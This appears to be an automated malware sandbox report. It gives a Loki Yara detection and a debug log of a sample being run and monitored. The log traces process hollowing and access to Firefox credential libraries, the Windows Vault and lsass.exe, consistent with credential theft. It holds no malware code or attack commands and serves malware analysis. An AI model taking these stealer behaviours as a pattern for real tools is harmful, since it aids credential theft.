Detections

Yara:

Loki

Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-23 05:54:24 2020-06-23 05:59:27 303 seconds Show Options Show Log
route = tor
2020-05-13 09:27:42,630 [root] INFO: Date set to: 20200623T05:54:23, timeout set to: 200
2020-06-23 05:54:23,062 [root] DEBUG: Starting analyzer from: C:\tmpt2nfl3rg
2020-06-23 05:54:23,062 [root] DEBUG: Storing results at: C:\ICwvvaQtg
2020-06-23 05:54:23,062 [root] DEBUG: Pipe server name: \\.\PIPE\RAvHWaBr
2020-06-23 05:54:23,062 [root] DEBUG: Python path: C:\Users\Louise\AppData\Local\Programs\Python\Python38-32
2020-06-23 05:54:23,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-23 05:54:23,078 [root] INFO: Automatically selected analysis package "exe"
2020-06-23 05:54:23,078 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-23 05:54:23,156 [root] DEBUG: Imported analysis package "exe".
2020-06-23 05:54:23,171 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-23 05:54:23,171 [root] DEBUG: Initialized analysis package "exe".
2020-06-23 05:54:23,265 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-23 05:54:23,265 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-23 05:54:23,265 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-23 05:54:23,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-23 05:54:23,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-23 05:54:23,328 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-23 05:54:23,328 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-23 05:54:23,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-23 05:54:23,343 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-23 05:54:23,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-23 05:54:23,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-23 05:54:23,375 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-23 05:54:23,375 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-23 05:54:23,390 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-23 05:54:23,390 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-23 05:54:23,390 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-23 05:54:23,390 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-23 05:54:23,390 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-23 05:54:23,390 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-23 05:54:23,390 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-23 05:54:23,406 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-23 05:54:23,562 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-23 05:54:23,578 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-23 05:54:23,578 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-23 05:54:23,578 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-23 05:54:23,578 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-23 05:54:23,578 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-23 05:54:23,578 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-23 05:54:23,593 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-23 05:54:23,593 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-23 05:54:23,593 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-23 05:54:23,593 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-23 05:54:23,593 [root] DEBUG: Started auxiliary module Browser
2020-06-23 05:54:23,593 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-23 05:54:23,593 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-23 05:54:23,593 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-23 05:54:23,593 [root] DEBUG: Started auxiliary module Curtain
2020-06-23 05:54:23,593 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-23 05:54:23,593 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-23 05:54:23,593 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-23 05:54:23,593 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-23 05:54:24,031 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-23 05:54:24,031 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-23 05:54:24,031 [root] DEBUG: Started auxiliary module DigiSig
2020-06-23 05:54:24,031 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-23 05:54:24,031 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-23 05:54:24,031 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-23 05:54:24,062 [root] DEBUG: Started auxiliary module Disguise
2020-06-23 05:54:24,062 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-23 05:54:24,062 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-23 05:54:24,062 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-23 05:54:24,062 [root] DEBUG: Started auxiliary module Human
2020-06-23 05:54:24,062 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-23 05:54:24,062 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-23 05:54:24,062 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-23 05:54:24,078 [root] DEBUG: Started auxiliary module Procmon
2020-06-23 05:54:24,078 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-23 05:54:24,078 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-23 05:54:24,078 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-23 05:54:24,078 [root] DEBUG: Started auxiliary module Screenshots
2020-06-23 05:54:24,078 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-23 05:54:24,078 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-23 05:54:24,078 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-23 05:54:24,093 [root] DEBUG: Started auxiliary module Sysmon
2020-06-23 05:54:24,093 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-23 05:54:24,093 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-23 05:54:24,093 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-23 05:54:24,093 [root] DEBUG: Started auxiliary module Usage
2020-06-23 05:54:24,093 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-23 05:54:24,093 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-23 05:54:24,093 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-23 05:54:24,093 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-23 05:54:24,203 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Louise\AppData\Local\Temp\gunzipped.exe" with arguments "" with pid 4492
2020-06-23 05:54:24,203 [lib.api.process] INFO: Monitor config for process 4492: C:\tmpt2nfl3rg\dll\4492.ini
2020-06-23 05:54:24,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\oLMTGsbh.dll, loader C:\tmpt2nfl3rg\bin\cYlEIKU.exe
2020-06-23 05:54:24,265 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:24,265 [root] DEBUG: Loader: Injecting process 4492 (thread 2704) with C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:24,265 [root] DEBUG: Process image base: 0x00400000
2020-06-23 05:54:24,265 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:24,265 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-23 05:54:24,265 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:24,281 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4492
2020-06-23 05:54:26,281 [lib.api.process] INFO: Successfully resumed process with pid 4492
2020-06-23 05:54:26,593 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-23 05:54:26,593 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-23 05:54:26,609 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-23 05:54:26,609 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4492 at 0x70020000, image base 0x400000, stack from 0x186000-0x190000
2020-06-23 05:54:26,609 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\gunzipped.exe".
2020-06-23 05:54:26,703 [root] INFO: Loaded monitor into process with pid 4492
2020-06-23 05:54:26,703 [root] INFO: Disabling sleep skipping.
2020-06-23 05:54:26,781 [root] INFO: Disabling sleep skipping.
2020-06-23 05:54:26,828 [root] DEBUG: set_caller_info: Adding region at 0x01E60000 to caller regions list (kernel32::GetSystemTime).
2020-06-23 05:54:26,859 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1e60000
2020-06-23 05:54:26,953 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ICwvvaQtg\CAPE\4492_79738358426341323262020 (size 0x8020)
2020-06-23 05:54:26,953 [root] DEBUG: DumpRegion: Dumped stack region from 0x003C0000, size 0x9000.
2020-06-23 05:54:26,968 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::memcpy).
2020-06-23 05:54:27,015 [root] INFO: Announced 32-bit process name: gunzipped.exe pid: 1804
2020-06-23 05:54:27,015 [lib.api.process] INFO: Monitor config for process 1804: C:\tmpt2nfl3rg\dll\1804.ini
2020-06-23 05:54:27,015 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\oLMTGsbh.dll, loader C:\tmpt2nfl3rg\bin\cYlEIKU.exe
2020-06-23 05:54:27,093 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:27,093 [root] DEBUG: Loader: Injecting process 1804 (thread 2372) with C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,093 [root] DEBUG: Process image base: 0x00400000
2020-06-23 05:54:27,093 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,109 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-23 05:54:27,109 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1804
2020-06-23 05:54:27,140 [root] DEBUG: DLL loaded at 0x75300000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-06-23 05:54:27,203 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-23 05:54:27,203 [root] DEBUG: CreateProcessHandler: using lpCommandLine: "C:\Users\Louise\AppData\Local\Temp\gunzipped.exe" .
2020-06-23 05:54:27,203 [root] DEBUG: CreateProcessHandler: Injection info set for new process 1804, ImageBase: 0x00400000
2020-06-23 05:54:27,203 [root] INFO: Announced 32-bit process name: gunzipped.exe pid: 1804
2020-06-23 05:54:27,203 [lib.api.process] INFO: Monitor config for process 1804: C:\tmpt2nfl3rg\dll\1804.ini
2020-06-23 05:54:27,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\oLMTGsbh.dll, loader C:\tmpt2nfl3rg\bin\cYlEIKU.exe
2020-06-23 05:54:27,265 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:27,265 [root] DEBUG: Loader: Injecting process 1804 (thread 2372) with C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,265 [root] DEBUG: Process image base: 0x00400000
2020-06-23 05:54:27,265 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,265 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-23 05:54:27,265 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,296 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1804
2020-06-23 05:54:27,296 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x11c amd local view 0x03C80000 to global list.
2020-06-23 05:54:27,296 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x11c to target process 1804.
2020-06-23 05:54:27,312 [root] INFO: Announced 32-bit process name: gunzipped.exe pid: 1804
2020-06-23 05:54:27,312 [lib.api.process] INFO: Monitor config for process 1804: C:\tmpt2nfl3rg\dll\1804.ini
2020-06-23 05:54:27,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\oLMTGsbh.dll, loader C:\tmpt2nfl3rg\bin\cYlEIKU.exe
2020-06-23 05:54:27,328 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:27,328 [root] DEBUG: Loader: Injecting process 1804 (thread 0) with C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,359 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-23 05:54:27,359 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2372, handle 0xc4
2020-06-23 05:54:27,359 [root] DEBUG: Process image base: 0x00400000
2020-06-23 05:54:27,359 [root] DEBUG: InjectDllViaIAT: Executable DOS header zero.
2020-06-23 05:54:27,359 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,375 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1804
2020-06-23 05:54:27,375 [root] DEBUG: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x000139DE (process 1804).
2020-06-23 05:54:27,375 [root] INFO: Announced 32-bit process name: gunzipped.exe pid: 1804
2020-06-23 05:54:27,375 [lib.api.process] INFO: Monitor config for process 1804: C:\tmpt2nfl3rg\dll\1804.ini
2020-06-23 05:54:27,375 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\oLMTGsbh.dll, loader C:\tmpt2nfl3rg\bin\cYlEIKU.exe
2020-06-23 05:54:27,390 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:27,406 [root] DEBUG: Loader: Injecting process 1804 (thread 2372) with C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,406 [root] DEBUG: Process image base: 0x00400000
2020-06-23 05:54:27,406 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,421 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-23 05:54:27,421 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-23 05:54:27,421 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:54:27,453 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1804
2020-06-23 05:54:27,453 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-06-23 05:54:27,453 [root] DEBUG: DumpProcess: Module entry point VA is 0x000139DE.
2020-06-23 05:54:27,546 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x18200.
2020-06-23 05:54:27,546 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-06-23 05:54:27,562 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1804.
2020-06-23 05:54:27,562 [root] DEBUG: DumpSectionViewsForPid: Shared section view found with pid 1804, local address 0x03C80000.
2020-06-23 05:54:27,562 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x3c80000
2020-06-23 05:54:27,562 [root] DEBUG: DumpSectionViewsForPid: Dumping PE image from shared section view, local address 0x03C80000.
2020-06-23 05:54:27,562 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-06-23 05:54:27,562 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x03C80000.
2020-06-23 05:54:27,562 [root] DEBUG: DumpProcess: Module entry point VA is 0x000139DE.
2020-06-23 05:54:27,578 [root] DEBUG: readPeSectionsFromProcess: Failed to relocate image back to header image base 0x00400000.
2020-06-23 05:54:27,593 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x18200.
2020-06-23 05:54:27,593 [root] DEBUG: DumpSectionViewsForPid: Dumped PE image from shared section view.
2020-06-23 05:54:27,593 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3c80001-0x3d22000.
2020-06-23 05:54:27,593 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4492
2020-06-23 05:54:27,609 [root] DEBUG: GetHookCallerBase: thread 5080 (handle 0x0), return address 0x003C36E2, allocation base 0x003C0000.
2020-06-23 05:54:27,609 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00400000.
2020-06-23 05:54:27,640 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-23 05:54:27,656 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-23 05:54:27,687 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa0800.
2020-06-23 05:54:27,687 [root] INFO: Disabling sleep skipping.
2020-06-23 05:54:27,687 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-23 05:54:27,687 [root] DEBUG: DLL unloaded from 0x75770000.
2020-06-23 05:54:27,687 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 1804 at 0x70020000, image base 0x400000, stack from 0x186000-0x190000
2020-06-23 05:54:27,781 [root] INFO: Process with pid 4492 has terminated
2020-06-23 05:54:27,937 [root] DEBUG: DLL loaded at 0x748F0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-23 05:54:28,015 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xfc amd local view 0x6FDF0000 to global list.
2020-06-23 05:54:28,015 [root] DEBUG: DLL loaded at 0x6FDF0000: C:\Program Files (x86)\Mozilla Firefox\nss3 (0x22f000 bytes).
2020-06-23 05:54:28,078 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6FD70000 for section view with handle 0xfc.
2020-06-23 05:54:28,109 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6FCF0000 for section view with handle 0xfc.
2020-06-23 05:54:28,140 [root] DEBUG: DLL loaded at 0x6FCF0000: C:\Windows\system32\MSVCP140 (0x71000 bytes).
2020-06-23 05:54:28,187 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74CA0000 for section view with handle 0xfc.
2020-06-23 05:54:28,234 [root] DEBUG: DLL loaded at 0x74CA0000: C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1 (0x3000 bytes).
2020-06-23 05:54:28,234 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C90000 for section view with handle 0xfc.
2020-06-23 05:54:28,281 [root] DEBUG: DLL loaded at 0x74C90000: C:\Windows\system32\api-ms-win-core-file-l1-2-0 (0x3000 bytes).
2020-06-23 05:54:28,281 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C70000 for section view with handle 0xfc.
2020-06-23 05:54:28,328 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\api-ms-win-crt-string-l1-1-0 (0x4000 bytes).
2020-06-23 05:54:28,359 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C30000 for section view with handle 0xfc.
2020-06-23 05:54:28,406 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\api-ms-win-crt-math-l1-1-0 (0x5000 bytes).
2020-06-23 05:54:28,421 [root] DEBUG: DLL loaded at 0x70400000: C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0 (0x5000 bytes).
2020-06-23 05:54:28,437 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74C10000 for section view with handle 0xfc.
2020-06-23 05:54:28,453 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\api-ms-win-crt-time-l1-1-0 (0x3000 bytes).
2020-06-23 05:54:28,468 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74BD0000 for section view with handle 0xfc.
2020-06-23 05:54:28,515 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0 (0x3000 bytes).
2020-06-23 05:54:28,562 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x74BF0000 for section view with handle 0xfc.
2020-06-23 05:54:28,593 [root] DEBUG: DLL loaded at 0x6FC90000: C:\Windows\system32\WINMM (0x32000 bytes).
2020-06-23 05:54:28,640 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6FC80000 for section view with handle 0xfc.
2020-06-23 05:54:28,703 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6FBD0000 for section view with handle 0x12c.
2020-06-23 05:54:28,750 [root] DEBUG: DLL loaded at 0x6FBD0000: C:\Program Files (x86)\Mozilla Firefox\freebl3 (0x6f000 bytes).
2020-06-23 05:54:29,359 [root] DEBUG: DLL unloaded from 0x6FBD0000.
2020-06-23 05:54:29,390 [root] DEBUG: DLL unloaded from 0x6FC40000.
2020-06-23 05:54:29,390 [root] DEBUG: DLL unloaded from 0x6FDF0000.
2020-06-23 05:54:29,453 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:54:29,609 [root] DEBUG: DLL unloaded from 0x75350000.
2020-06-23 05:54:30,062 [root] DEBUG: DLL loaded at 0x70400000: C:\Windows\system32\vaultcli (0xc000 bytes).
2020-06-23 05:54:30,078 [root] DEBUG: DLL unloaded from 0x75600000.
2020-06-23 05:54:30,390 [root] INFO: Announced starting service "b'VaultSvc'"
2020-06-23 05:54:30,406 [lib.api.process] INFO: Monitor config for process 472: C:\tmpt2nfl3rg\dll\472.ini
2020-06-23 05:54:30,484 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpt2nfl3rg\dll\BWNQCbd.dll, loader C:\tmpt2nfl3rg\bin\IDDlfGSW.exe
2020-06-23 05:54:30,531 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:30,546 [root] DEBUG: Loader: Injecting process 472 (thread 0) with C:\tmpt2nfl3rg\dll\BWNQCbd.dll.
2020-06-23 05:54:30,593 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x000007FFFFFD4000 Local PEB 0x000007FFFFFDD000 Local TEB 0x000007FFFFFDF000: The operation completed successfully.
2020-06-23 05:54:30,593 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 218, handle 0x0
2020-06-23 05:54:30,625 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-23 05:54:30,625 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-23 05:54:30,640 [root] INFO: Disabling sleep skipping.
2020-06-23 05:54:30,640 [root] DEBUG: CAPE initialised: 64-bit monitor loaded in process 472 at 0x0000000073620000, image base 0x00000000FFBB0000, stack from 0x0000000001BD6000-0x0000000001BE0000
2020-06-23 05:54:30,640 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2020-06-23 05:54:30,703 [root] WARNING: b'Unable to place hook on LockResource'
2020-06-23 05:54:30,718 [root] WARNING: b'Unable to hook LockResource'
2020-06-23 05:54:30,734 [root] INFO: Loaded monitor into process with pid 472
2020-06-23 05:54:30,734 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-06-23 05:54:30,734 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-06-23 05:54:30,750 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\BWNQCbd.dll.
2020-06-23 05:54:31,812 [root] INFO: Announced 64-bit process name: lsass.exe pid: 4984
2020-06-23 05:54:31,812 [lib.api.process] INFO: Monitor config for process 4984: C:\tmpt2nfl3rg\dll\4984.ini
2020-06-23 05:54:31,828 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpt2nfl3rg\dll\BWNQCbd.dll, loader C:\tmpt2nfl3rg\bin\IDDlfGSW.exe
2020-06-23 05:54:31,859 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:54:31,875 [root] DEBUG: Loader: Injecting process 4984 (thread 2156) with C:\tmpt2nfl3rg\dll\BWNQCbd.dll.
2020-06-23 05:54:31,890 [root] DEBUG: Process image base: 0x00000000FF730000
2020-06-23 05:54:31,890 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\BWNQCbd.dll.
2020-06-23 05:54:31,890 [root] DEBUG: InjectDllViaIAT: Failed to allocate region in target process for new import table.
2020-06-23 05:54:31,906 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-06-23 05:54:31,921 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-23 05:54:31,937 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-23 05:54:31,953 [root] INFO: Disabling sleep skipping.
2020-06-23 05:54:31,984 [root] DEBUG: CAPE initialised: 64-bit monitor loaded in process 4984 at 0x0000000073620000, image base 0x00000000FF730000, stack from 0x0000000000284000-0x0000000000290000
2020-06-23 05:54:31,984 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2020-06-23 05:54:32,031 [root] WARNING: b'Unable to place hook on LockResource'
2020-06-23 05:54:32,031 [root] WARNING: b'Unable to hook LockResource'
2020-06-23 05:54:32,062 [root] INFO: Loaded monitor into process with pid 4984
2020-06-23 05:54:32,062 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-06-23 05:54:32,093 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-06-23 05:54:32,109 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\BWNQCbd.dll.
2020-06-23 05:54:32,125 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\lsass.exe.
2020-06-23 05:54:32,125 [root] DEBUG: CreateProcessHandler: Injection info set for new process 4984, ImageBase: 0x00000000FF730000
2020-06-23 05:54:32,140 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4984.
2020-06-23 05:55:02,156 [root] INFO: Process with pid 4984 has terminated
2020-06-23 05:55:02,203 [root] INFO: Announced 32-bit process name: gunzipped.exe pid: 1804
2020-06-23 05:55:02,203 [lib.api.process] INFO: Monitor config for process 1804: C:\tmpt2nfl3rg\dll\1804.ini
2020-06-23 05:55:02,218 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\oLMTGsbh.dll, loader C:\tmpt2nfl3rg\bin\cYlEIKU.exe
2020-06-23 05:55:02,328 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\RAvHWaBr.
2020-06-23 05:55:02,328 [root] DEBUG: Loader: Injecting process 1804 (thread 3112) with C:\tmpt2nfl3rg\dll\oLMTGsbh.dll.
2020-06-23 05:55:02,328 [root] DEBUG: Process image base: 0x00400000
2020-06-23 05:55:02,328 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-06-23 05:55:02,343 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-06-23 05:55:02,343 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::LdrLoadDll).
2020-06-23 05:55:02,343 [root] DEBUG: set_caller_info: Adding region at 0x01E50000 to caller regions list (kernel32::GetSystemTime).
2020-06-23 05:55:02,375 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1e50000
2020-06-23 05:55:02,375 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01E50000 size 0x400000.
2020-06-23 05:55:02,375 [root] DEBUG: DumpPEsInRange: Scanning range 0x1e50000 - 0x1e51000.
2020-06-23 05:55:02,375 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1e50000-0x1e51000.
2020-06-23 05:55:02,437 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ICwvvaQtg\CAPE\1804_21145685872351323262020 (size 0xffe)
2020-06-23 05:55:02,437 [root] DEBUG: DumpRegion: Dumped stack region from 0x01E50000, size 0x1000.
2020-06-23 05:55:02,500 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ICwvvaQtg\CAPE\1804_18970645282351323262020 (size 0x12b)
